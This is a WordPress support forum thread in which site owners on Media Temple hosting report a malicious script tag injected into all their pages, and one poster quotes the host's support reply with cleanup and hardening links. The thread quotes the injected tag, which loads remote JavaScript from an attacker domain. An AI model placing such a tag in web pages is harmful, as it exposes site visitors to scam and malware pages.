Found a wierd script in my WordPress pages
-
Hey, Today I was looking through my pages and all of a sudden i have the script <script src=”http://ue.oeaou.com/31″></script> in all of them. Did my wordpress get hacked or what is this? It is in all my wordpress pages now.
-
Weird I just found it too and when you load that page you see Javascript code. Towards the bottom is another URL and if you follow that one you get a spam site that “scans” your computer for viruses. How did they get this on all my posts?
I have the same issue on several of my sites, but not on all. Maybe it has really something to do with an installed plugin, but at the moment I don’t believe in this, as my sites use different plugins.
I have the same issue today. all sites on my MediaTemplate host have been effected.
@thekmen, are you on a shared server with (mt)? Or a dedicated box?
@gtrutch yeah, on their grid service plan.
I got hacked with the <script src=”http://ue.oeaou.com/31″></script> I’m on the Media Temple (gs) hosting.
Media temple support sent me this claiming it’s not them….. after reading all of these posts in the forum I am finding it hard to believe. But here is what they said.
Hello and thank you for contacting (mt) Media Temple Support.
We understand that this kind of issue can be quite inconvenient and frustrating. However, we have done a deep analysis of the (gs) Grid-Service and found that our infrastructure is secure and is not a source of website vulnerability. Most likely, you have fallen victim to an application-level vulnerability or your FTP/database login credentials were obtained by a malicious outside party. Please note that issues of this type are not limited to any one application, web technology, or hosting provider. To begin moving forward, we strongly recommend that you utilize this article to work on recovering from a site compromise:
http://wiki.mediatemple.net/w/Recovering_from_a_site_compromiseIf you do not feel comfortable resolving compromise-related issues yourself, Sucuri.net has extended a substantial discount on their scan/cleanup services to (mt) customers:
http://sucuri.net/mediatempleIf you are experiencing a “redirect hack,” in which your domain is unexpectedly redirected to an external site, please go here for cleanup instructions:
http://wiki.mediatemple.net/w/WordPress_Redirect_ExploitFor sites that have been denoted as suspicious by Google, once your site has been relieved of all malicious content, you will want to request a re-indexing of your site(s) via Google Webmaster Tools. More information about the review process is available in Google’s Webmaster Help Center, and here are the related resources:
http://www.google.com/webmasters/tools
http://www.google.com/support/webmasters/bin/answer.py?answer=163633If you happen to be running WordPress, and you have noticed the appearance of an unexpected WordPress user in your database, for example “johnnyA”, “johnnyB”, or “amin”, you will want to remove those users as soon as possible. Also, here is a third-party article that you may find helpful in removing any injected code:
http://www.uhleeka.com/blog/2010/07/johnnya-wordpress-malware-on-mediatemple/In addition, here are instructions on how to “harden” a WordPress blog:
http://codex.wordpress.org/Hardening_WordPress
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/For a helpful list of security best-practice articles and additional security information related to (mt), please visit our newly created security resource in the (mt) Wiki:
http://mediatemple.net/securityPlease let us know if you have any additional questions.
We got the exact same auto-response from them.
Wait, so we’re all on Media Temple?
yeah, all seem to be on Media Temple and getting the same auto respond email by the looks of it.
I am kind of over media temple, personally – for the $20 a month for the grid service I seem to get nothing but a prettier admin panel. In terms of speed and bandwidth DreamHost was the same but half the price.
- The topic ‘Found a wierd script in my WordPress pages’ is closed to new replies.